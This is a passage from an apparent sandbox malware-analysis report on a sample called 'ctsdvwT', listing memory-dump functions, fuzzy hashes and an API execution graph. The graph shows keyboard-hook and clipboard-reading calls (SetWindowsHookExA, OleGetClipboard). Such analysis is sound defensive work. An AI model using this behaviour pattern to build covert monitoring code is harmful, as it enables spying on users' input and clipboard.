                                        Function 00E5D4C4 Relevance: .1, Instructions: 75COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1947190571.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_e5d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8da3ff7c86d6b62b8785e20461cc4bf8c14c64a3f7adceee04a511fd65ad3846
                                        • Instruction ID: 0e6d61c95363cd3b0e3025addcd044cc223276865d61e5d8be70c1d020fa8f5c
                                        • Opcode Fuzzy Hash: 8da3ff7c86d6b62b8785e20461cc4bf8c14c64a3f7adceee04a511fd65ad3846
                                        • Instruction Fuzzy Hash: 3E210371508240DFDB25DF10D9C0B26BB65FB88319F20C969EC095B256D336D85ACAA2
                                        Function 00E6D1D4 Relevance: .1, Instructions: 72COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1947270280.0000000000E6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E6D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_e6d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ef14ab2098ed838b7cc08f055c6f0147e8ed40d04dc968d3ae654cf17dcb42e9
                                        • Instruction ID: 86eb6cd7730aac7059ebd3006bde7fd9e131733efc2a8081eb10216a163b3831
                                        • Opcode Fuzzy Hash: ef14ab2098ed838b7cc08f055c6f0147e8ed40d04dc968d3ae654cf17dcb42e9
                                        • Instruction Fuzzy Hash: D5214971A48340DFDB00DF10EDD0B25BBA5FB84318F64C56DD8095B262C336D846CB61
                                        Function 00E6D01C Relevance: .1, Instructions: 72COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1947270280.0000000000E6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E6D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_e6d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 49452895920cd75811dea75357df26cd82c56fa643bc579e7abf302bf6a6a084
                                        • Instruction ID: ec8de78e3ec148b4dd9244d358d42764a7d63642f99370869ed79e19a609ffec
                                        • Opcode Fuzzy Hash: 49452895920cd75811dea75357df26cd82c56fa643bc579e7abf302bf6a6a084
                                        • Instruction Fuzzy Hash: 3021F575A48340DFDB54DF10E980B16BB66FB84318F64C569D8495B286C337D847CA61
                                        Function 00E6D005 Relevance: .1, Instructions: 62COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1947270280.0000000000E6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E6D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_e6d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 11cf502847f2e40b397806b391ea4c13fa6846e834ea676479471661108ca964
                                        • Instruction ID: 1e974bc698d6b5d3892a7c9db28f6490087d3ea97471b8d86141c07d535f206b
                                        • Opcode Fuzzy Hash: 11cf502847f2e40b397806b391ea4c13fa6846e834ea676479471661108ca964
                                        • Instruction Fuzzy Hash: 3921537554D3C08FC712CF24D994715BF72EB46318F28C5EAD8498B6A7C33A984ACB62
                                        Function 00E5D1F7 Relevance: .1, Instructions: 57COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1947190571.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_e5d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ed047447bd486b7177fd6f5a6328ccc2b655c600b881774d0be4f41f3027c7dc
                                        • Instruction ID: b1ba1060c899deed7bca8ceaded07fa982888d1854de188dc3f097078ff87e4d
                                        • Opcode Fuzzy Hash: ed047447bd486b7177fd6f5a6328ccc2b655c600b881774d0be4f41f3027c7dc
                                        • Instruction Fuzzy Hash: AD21DF76408280CFDB16CF00D9C4B16BF72FB84314F24C5A9DC080B666C33AD82ACBA1
                                        Function 00E5D4BF Relevance: .1, Instructions: 56COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1947190571.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_e5d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 510a4494be8f8f37c5290ac1f004916700623b455eed770fed4643cd7704ed07
                                        • Instruction ID: bde802d01601fdf94ec538d6427928934fc9482fe7b7693f8a9da64f2b9f6171
                                        • Opcode Fuzzy Hash: 510a4494be8f8f37c5290ac1f004916700623b455eed770fed4643cd7704ed07
                                        • Instruction Fuzzy Hash: 6D11D376504280CFCB15CF10D9C4B16BF71FB94328F24C6A9DC494B656D336D85ACBA1
                                        Function 00E6D1CF Relevance: .1, Instructions: 53COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1947270280.0000000000E6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E6D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_e6d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c968dcaa042c25ee6ba8684c53e35a7e88ce7353a734fe3290a9ec7f8938d7ca
                                        • Instruction ID: cfb238c18d724373d0d4c8735f709ca70c47f33f1c03feaa1e14a0edd4482c32
                                        • Opcode Fuzzy Hash: c968dcaa042c25ee6ba8684c53e35a7e88ce7353a734fe3290a9ec7f8938d7ca
                                        • Instruction Fuzzy Hash: D811BE75A48280DFCB11CF50D9D0B15FB71FB84328F28C6A9D8494B666C33AD85ACB51
                                        Function 00E5D759 Relevance: .0, Instructions: 45COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1947190571.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_e5d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a4a316f45f1b83be0d9fb9523745d4a4cebfbd88f97fb0f6826a3376748dd7bc
                                        • Instruction ID: 1bb62fd2b85e115daffaee37f2ec1d2d7b9aa80647d5d4c82081b583d88b0e86
                                        • Opcode Fuzzy Hash: a4a316f45f1b83be0d9fb9523745d4a4cebfbd88f97fb0f6826a3376748dd7bc
                                        • Instruction Fuzzy Hash: 1D01F7710083409AE7204A21CC80B67BBD8EF45725F18C81BED081A282C3399844CAB2
                                        Function 00E5D758 Relevance: .0, Instructions: 36COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1947190571.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_e5d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b3e7d2e2022d8f0c950a99f0f69848babc7120f439938645c59f4f87921e6fb2
                                        • Instruction ID: b9d0eb8d038893b32a117f61d536991b84f198516e00fd1803ed7a4e226e554c
                                        • Opcode Fuzzy Hash: b3e7d2e2022d8f0c950a99f0f69848babc7120f439938645c59f4f87921e6fb2
                                        • Instruction Fuzzy Hash: 68F0C231008344AEE7208A16CC84B62FBA8EF55729F18C45AED081A296C3799C44CAB1

                                        Execution Graph

                                        Execution Coverage:10.6%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:0%
                                        Total number of Nodes:177
                                        Total number of Limit Nodes:18
                                        execution_graph 24833 68b78ca 24834 68b7918 GetModuleHandleW 24833->24834 24835 68b7912 24833->24835 24836 68b7945 24834->24836 24835->24834 24837 68bfe08 24838 68bfe4c SetWindowsHookExA 24837->24838 24840 68bfe92 24838->24840 24994 68bc6d8 24995 68bc72f DuplicateHandle 24994->24995 24996 68bc76e 24995->24996 24997 68b8978 24998 68b89e0 CreateWindowExW 24997->24998 25000 68b8a9c 24998->25000 24841 157d01c 24842 157d034 24841->24842 24843 157d08e 24842->24843 24849 68b6c24 24842->24849 24853 68b6c34 24842->24853 24861 68b8b30 24842->24861 24867 68b8b22 24842->24867 24873 68bd2b3 24842->24873 24850 68b6c2f 24849->24850 24881 68b6c5c 24850->24881 24852 68b8c67 24852->24843 24854 68b6c3f 24853->24854 24855 68bd341 24854->24855 24857 68bd331 24854->24857 24924 68bc28c 24855->24924 24912 68bd458 24857->24912 24918 68bd468 24857->24918 24858 68bd33f 24862 68b8b56 24861->24862 24863 68b6c24 GetModuleHandleW 24862->24863 24864 68b8b62 24863->24864 24865 68b6c34 2 API calls 24864->24865 24866 68b8b77 24865->24866 24866->24843 24868 68b8b56 24867->24868 24869 68b6c24 GetModuleHandleW 24868->24869 24870 68b8b62 24869->24870 24871 68b6c34 2 API calls 24870->24871 24872 68b8b77 24871->24872 24872->24843 24874 68bd2ba 24873->24874 24875 68bd341 24874->24875 24877 68bd331 24874->24877 24876 68bc28c 2 API calls 24875->24876 24878 68bd33f 24876->24878 24879 68bd458 2 API calls 24877->24879 24880 68bd468 2 API calls 24877->24880 24879->24878 24880->24878 24882 68b6c67 24881->24882 24887 68b5e3c 24882->24887 24884 68b8cc9 24886 68b8d37 24884->24886 24892 68b5e4c 24884->24892 24888 68b5e47 24887->24888 24889 68b7393 24888->24889 24896 68b75ef 24888->24896 24904 68b7683 24888->24904 24889->24884 24893 68b78d0 GetModuleHandleW 24892->24893 24895 68b7945 24893->24895 24895->24886 24897 68b75fa 24896->24897 24898 68b5e4c GetModuleHandleW 24897->24898 24899 68b771a 24898->24899 24900 68b5e4c GetModuleHandleW 24899->24900 24901 68b7794 24899->24901 24902 68b7768 24900->24902 24901->24889 24902->24901 24903 68b5e4c GetModuleHandleW 24902->24903 24903->24901 24905 68b76af 24904->24905 24906 68b5e4c GetModuleHandleW 24905->24906 24907 68b771a 24906->24907 24908 68b5e4c GetModuleHandleW 24907->24908 24909 68b7794 24907->24909 24910 68b7768 24908->24910 24909->24889 24910->24909 24911 68b5e4c GetModuleHandleW 24910->24911 24911->24909 24914 68bd468 24912->24914 24913 68bc28c 2 API calls 24913->24914 24914->24913 24915 68bd552 24914->24915 24931 68bd940 24914->24931 24936 68bd930 24914->24936 24915->24858 24920 68bd476 24918->24920 24919 68bc28c 2 API calls 24919->24920 24920->24919 24921 68bd552 24920->24921 24922 68bd930 OleGetClipboard 24920->24922 24923 68bd940 OleGetClipboard 24920->24923 24921->24858 24922->24920 24923->24920 24925 68bc297 24924->24925 24926 68bd5aa 24925->24926 24927 68bd654 24925->24927 24929 68bd602 CallWindowProcW 24926->24929 24930 68bd5b1 24926->24930 24928 68b6c34 OleGetClipboard 24927->24928 24928->24930 24929->24930 24930->24858 24932 68bd95f 24931->24932 24933 68bd9e6 24932->24933 24941 68bdf00 24932->24941 24947 68bdeb7 24932->24947 24933->24914 24937 68bd93e 24936->24937 24938 68bd9e6 24937->24938 24939 68bdf00 OleGetClipboard 24937->24939 24940 68bdeb7 OleGetClipboard 24937->24940 24938->24914 24939->24937 24940->24937 24943 68bdf08 24941->24943 24942 68bdf1c 24942->24932 24943->24942 24953 68bdf38 24943->24953 24964 68bdf48 24943->24964 24944 68bdf31 24944->24932 24949 68bdebb 24947->24949 24948 68bdf1c 24948->24932 24949->24948 24951 68bdf38 OleGetClipboard 24949->24951 24952 68bdf48 OleGetClipboard 24949->24952 24950 68bdf31 24950->24932 24951->24950 24952->24950 24954 68bdf5a 24953->24954 24955 68bdfb9 24954->24955 24956 68bdf75 24954->24956 24958 68be039 24955->24958 24975 68be210 24955->24975 24979 68be200 24955->24979 24959 68bdf38 OleGetClipboard 24956->24959 24960 68bdf48 OleGetClipboard 24956->24960 24957 68be057 24957->24944 24958->24944 24963 68bdf7b 24959->24963 24960->24963 24963->24944 24965 68bdf5a 24964->24965 24966 68bdf75 24965->24966 24968 68bdfb9 24965->24968 24973 68bdf38 OleGetClipboard 24966->24973 24974 68bdf48 OleGetClipboard 24966->24974 24967 68bdf7b 24967->24944 24970 68be039 24968->24970 24971 68be200 OleGetClipboard 24968->24971 24972 68be210 OleGetClipboard 24968->24972 24969 68be057 24969->24944 24970->24944 24971->24969 24972->24969 24973->24967 24974->24967 24977 68be225 24975->24977 24978 68be24b 24977->24978 24983 68bdca0 24977->24983 24978->24957 24981 68be210 24979->24981 24980 68bdca0 OleGetClipboard 24980->24981 24981->24980 24982 68be24b 24981->24982 24982->24957 24984 68be2b8 OleGetClipboard 24983->24984 24986 68be352 24984->24986 24987 68be120 24989 68be12b 24987->24989 24988 68be13b 24989->24988 24991 68bdb8c 24989->24991 24992 68be170 OleInitialize 24991->24992 24993 68be1d4 24992->24993 24993->24988 25001 68b58f0 25002 68b5902 25001->25002 25005 68b59b3 25002->25005 25007 68b03a4 25002->25007 25004 68b5979 25012 68b03c4 25004->25012 25008 68b03af 25007->25008 25016 68b6ea1 25008->25016 25025 68b6eb0 25008->25025 25009 68b5f5a 25009->25004 25014 68b03cf 25012->25014 25015 68bd88b 25014->25015 25040 68bc2e4 25014->25040 25015->25005 25017 68b6edb 25016->25017 25018 68b5e3c GetModuleHandleW 25017->25018 25019 68b6f42 25018->25019 25024 68b5e3c GetModuleHandleW 25019->25024 25034 68b7379 25019->25034 25020 68b6f5e 25021 68b5e4c GetModuleHandleW 25020->25021 25022 68b6f8a 25020->25022 25021->25022 25024->25020 25026 68b6edb 25025->25026 25027 68b5e3c GetModuleHandleW 25026->25027 25028 68b6f42 25027->25028 25032 68b7379 GetModuleHandleW 25028->25032 25033 68b5e3c GetModuleHandleW 25028->25033 25029 68b6f5e 25030 68b6f8a 25029->25030 25031 68b5e4c GetModuleHandleW 25029->25031 25030->25030 25031->25030 25032->25029 25033->25029 25035 68b7393 25034->25035 25036 68b7397 25034->25036 25035->25020 25037 68b74ce 25036->25037 25038 68b75ef GetModuleHandleW 25036->25038 25039 68b7683 GetModuleHandleW 25036->25039 25038->25037 25039->25037 25041 68bd8a0 KiUserCallbackDispatcher 25040->25041 25043 68bd90e 25041->25043 25043->25014

                                        Executed Functions

                                        Function 03089638 Relevance: 2.8, Instructions: 2823COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b863dcfe8968ffa253cecaafd7453126602ec05adcd34942c137c0ffb436f850
                                        • Instruction ID: c2a8cd1607db790f68db02f19187b7db25772140ce800121b0123d9df07c98d2
                                        • Opcode Fuzzy Hash: b863dcfe8968ffa253cecaafd7453126602ec05adcd34942c137c0ffb436f850
                                        • Instruction Fuzzy Hash: BA530931D11B1A8ADB51EF68C8845A9F7B1FF99300F15C79AE44877121FB70AAD4CB81
                                        Function 0308C8B0 Relevance: 2.3, Instructions: 2323COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 80fede4782226d6ea089bee3a2b5713eda53d1d3a6aebe429457668379d9e4e9
                                        • Instruction ID: 8cdf521565e7787d99693b6a2f81b7a399a7eddfa7dbbc6afcc28d311b107b00
                                        • Opcode Fuzzy Hash: 80fede4782226d6ea089bee3a2b5713eda53d1d3a6aebe429457668379d9e4e9
                                        • Instruction Fuzzy Hash: 38332F31D1071A8EDB11EF68C8846ADF7B1FF99300F15C79AD459AB211EB70AAC5CB81
                                        Function 03084AA8 Relevance: .3, Instructions: 266COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 82fb2addb11e7d18c6aa1c81795fbeb7a2dd0bd34a424b80837aab369e551db7
                                        • Instruction ID: 1a6237fad1e628c834759ac8d7867b8b505337d494d89e199b9340d793e7ef69
                                        • Opcode Fuzzy Hash: 82fb2addb11e7d18c6aa1c81795fbeb7a2dd0bd34a424b80837aab369e551db7
                                        • Instruction Fuzzy Hash: C4B17D70E0131ACFDB50EFAAC88179DFBF2AF88314F198529D455EB294EB749845CB81
                                        Function 03083E90 Relevance: .2, Instructions: 238COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7329ffe921e4ce515fe16b999506f9f7306f4d7d82708502298d7c902c690688
                                        • Instruction ID: 28ca0a5cffaab6f157ff767eaff6eb9105ca04dd6cc0939102beadb864b55be6
                                        • Opcode Fuzzy Hash: 7329ffe921e4ce515fe16b999506f9f7306f4d7d82708502298d7c902c690688
                                        • Instruction Fuzzy Hash: 6F917074E0120ADFDF50EFAAC8817DEBBF2AF88714F188129E454EB254DB749845CB85
                                        Function 068B8972 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 927 68b8972-68b89de 928 68b89e9-68b89f0 927->928 929 68b89e0-68b89e6 927->929 930 68b89fb-68b8a33 928->930 931 68b89f2-68b89f8 928->931 929->928 932 68b8a3b-68b8a9a CreateWindowExW 930->932 931->930 933 68b8a9c-68b8aa2 932->933 934 68b8aa3-68b8adb 932->934 933->934 938 68b8ae8 934->938 939 68b8add-68b8ae0 934->939 940 68b8ae9 938->940 939->938 940->940
                                        APIs
                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 068B8A8A
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4190880608.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_68b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: CreateWindow
                                        • String ID:
                                        • API String ID: 716092398-0
                                        • Opcode ID: 032acaabf8cd1d178a3060cc4b3a57c51039c19d34cd32ef00a27b2b6698d616
                                        • Instruction ID: fbac8f8fcd1d13d5a671df31f24ce4459c97c06f4b1c557c8688f4ab1a98d4c6
                                        • Opcode Fuzzy Hash: 032acaabf8cd1d178a3060cc4b3a57c51039c19d34cd32ef00a27b2b6698d616
                                        • Instruction Fuzzy Hash: 3151CEB1D10349DFDB14CFAAC884ADEFBB5BF48310F24952AE418AB250D775A885CF91
                                        Function 068B8978 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 941 68b8978-68b89de 942 68b89e9-68b89f0 941->942 943 68b89e0-68b89e6 941->943 944 68b89fb-68b8a9a CreateWindowExW 942->944 945 68b89f2-68b89f8 942->945 943->942 947 68b8a9c-68b8aa2 944->947 948 68b8aa3-68b8adb 944->948 945->944 947->948 952 68b8ae8 948->952 953 68b8add-68b8ae0 948->953 954 68b8ae9 952->954 953->952 954->954
                                        APIs
                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 068B8A8A
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4190880608.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_68b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: CreateWindow
                                        • String ID:
                                        • API String ID: 716092398-0
                                        • Opcode ID: b23f8e454d11721951971b6d4339078e6d0a47e3892df4ce441106f48cad5cd2
                                        • Instruction ID: c8248f3927c189e8aaee56096364b157bb5bc5c52aab8bad13c7c87312284823
                                        • Opcode Fuzzy Hash: b23f8e454d11721951971b6d4339078e6d0a47e3892df4ce441106f48cad5cd2
                                        • Instruction Fuzzy Hash: 7841CEB1D10309DFDB14CFAAC884ADEBBB5BF48310F24952AE918AB250D775A845CF91
                                        Function 068BC798 Relevance: 1.6, APIs: 1, Instructions: 102COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 955 68bc798-68bc8c6
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 068BC75F
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4190880608.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_68b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: 90a5de0b6f978a4b33f4f9e68af92079494f0cf7b424c25d4a46c6eab14c2a18
                                        • Instruction ID: ea1e8f2b94f3e3fc3b6fed89efa23b6b7d8ebe4fe68883f4c5241113d0b30842
                                        • Opcode Fuzzy Hash: 90a5de0b6f978a4b33f4f9e68af92079494f0cf7b424c25d4a46c6eab14c2a18
                                        • Instruction Fuzzy Hash: 6E417E75A403449FE760EF64F949AAD7BF6FB49304F50C02AE9019B786DB785805CF20
                                        Function 068BC28C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 967 68bc28c-68bd5a4 970 68bd5aa-68bd5af 967->970 971 68bd654-68bd674 call 68b6c34 967->971 973 68bd602-68bd63a CallWindowProcW 970->973 974 68bd5b1-68bd5e8 970->974 978 68bd677-68bd684 971->978 976 68bd63c-68bd642 973->976 977 68bd643-68bd652 973->977 980 68bd5ea-68bd5f0 974->980 981 68bd5f1-68bd600 974->981 976->977 977->978 980->981 981->978
                                        APIs
                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 068BD629
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4190880608.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_68b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: CallProcWindow
                                        • String ID:
                                        • API String ID: 2714655100-0
                                        • Opcode ID: 2ee47567329624deac805f4e60ab74d0e893b44a3a539da68201b32fc2cf262a
                                        • Instruction ID: a47b95ff906b3410d3e8ff6e91082de91f29eabd9fe0a5f1a3235a51b36edd1e
                                        • Opcode Fuzzy Hash: 2ee47567329624deac805f4e60ab74d0e893b44a3a539da68201b32fc2cf262a
                                        • Instruction Fuzzy Hash: 314127B4900349DFDB54CF99C888AAEBBF5FF88314F248459E519AB321D734A845CFA0
                                        Function 068BE2AC Relevance: 1.6, APIs: 1, Instructions: 78comclipboardCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 984 68be2ac-68be308 986 68be312-68be350 OleGetClipboard 984->986 987 68be359-68be3a7 986->987 988 68be352-68be358 986->988 993 68be3a9-68be3ad 987->993 994 68be3b7 987->994 988->987 993->994 995 68be3af 993->995 996 68be3b8 994->996 995->994 996->996
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4190880608.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_68b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: Clipboard
                                        • String ID:
                                        • API String ID: 220874293-0
                                        • Opcode ID: 7e203602a87ff32e312bc16bb12be7be2cab42140d08c9191d24be7506f56c10
                                        • Instruction ID: 99a42671363f627b7e0f8adb1d933670e5bafc4e98a4737692004531bfeba9d7
                                        • Opcode Fuzzy Hash: 7e203602a87ff32e312bc16bb12be7be2cab42140d08c9191d24be7506f56c10
                                        • Instruction Fuzzy Hash: 5131F2B0D01349DFDB14CFA9C884BCDBBF5AF48714F248419E544AB3A0D774A949CB65
                                        Function 068BDCA0 Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 997 68bdca0-68be350 OleGetClipboard 1000 68be359-68be3a7 997->1000 1001 68be352-68be358 997->1001 1006 68be3a9-68be3ad 1000->1006 1007 68be3b7 1000->1007 1001->1000 1006->1007 1008 68be3af 1006->1008 1009 68be3b8 1007->1009 1008->1007 1009->1009
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4190880608.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_68b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: Clipboard
                                        • String ID:
                                        • API String ID: 220874293-0
                                        • Opcode ID: 73c9d923fdcc783225fac2269993299f2e0b107d592a322fd88035ff65d9c9cd
                                        • Instruction ID: 22bd3da3468e4fa85814bf43c0f9ef26c82b2f43b559646a249b6868c15becd1
                                        • Opcode Fuzzy Hash: 73c9d923fdcc783225fac2269993299f2e0b107d592a322fd88035ff65d9c9cd
                                        • Instruction Fuzzy Hash: 8B31F0B0D01249DFEB14CFA9C888BCDBBF5AB48304F248019E504BB3A0D7B4A845CB91
                                        Function 068BC6D0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1010 68bc6d0-68bc72c 1011 68bc72f-68bc76c DuplicateHandle 1010->1011 1012 68bc76e-68bc774 1011->1012 1013 68bc775-68bc792 1011->1013 1012->1013
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 068BC75F
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4190880608.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_68b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: 3825d1489ece83374b2064a6a014498ff0fe1077019ca19fe53a7d179aa51c8a
                                        • Instruction ID: b19a2f89cbf10e0d7ac9e5b382924b0b1f2759837c86a4b5602ac6cc973b457a
                                        • Opcode Fuzzy Hash: 3825d1489ece83374b2064a6a014498ff0fe1077019ca19fe53a7d179aa51c8a
                                        • Instruction Fuzzy Hash: 812100B5800249AFDB10CFAAD884AEEBFF4EB48310F14841AE918A3350D378A941CF60
                                        Function 068BC6D8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1016 68bc6d8-68bc76c DuplicateHandle 1018 68bc76e-68bc774 1016->1018 1019 68bc775-68bc792 1016->1019 1018->1019
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 068BC75F
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4190880608.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_68b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: 299ba4620314bbcffbaab00b88df0db1b547b38ebadb948dee1fe626d6c2a39a
                                        • Instruction ID: 63ee4eb78b1616b37d554f9a2b90ab4627186b0d6f7bc7889d5782aed2f90445
                                        • Opcode Fuzzy Hash: 299ba4620314bbcffbaab00b88df0db1b547b38ebadb948dee1fe626d6c2a39a
                                        • Instruction Fuzzy Hash: 0721E4B5900349AFDB10CFAAD884ADEBBF4EB48310F14841AE914A3350D374A945CF64
                                        Function 068BFE03 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
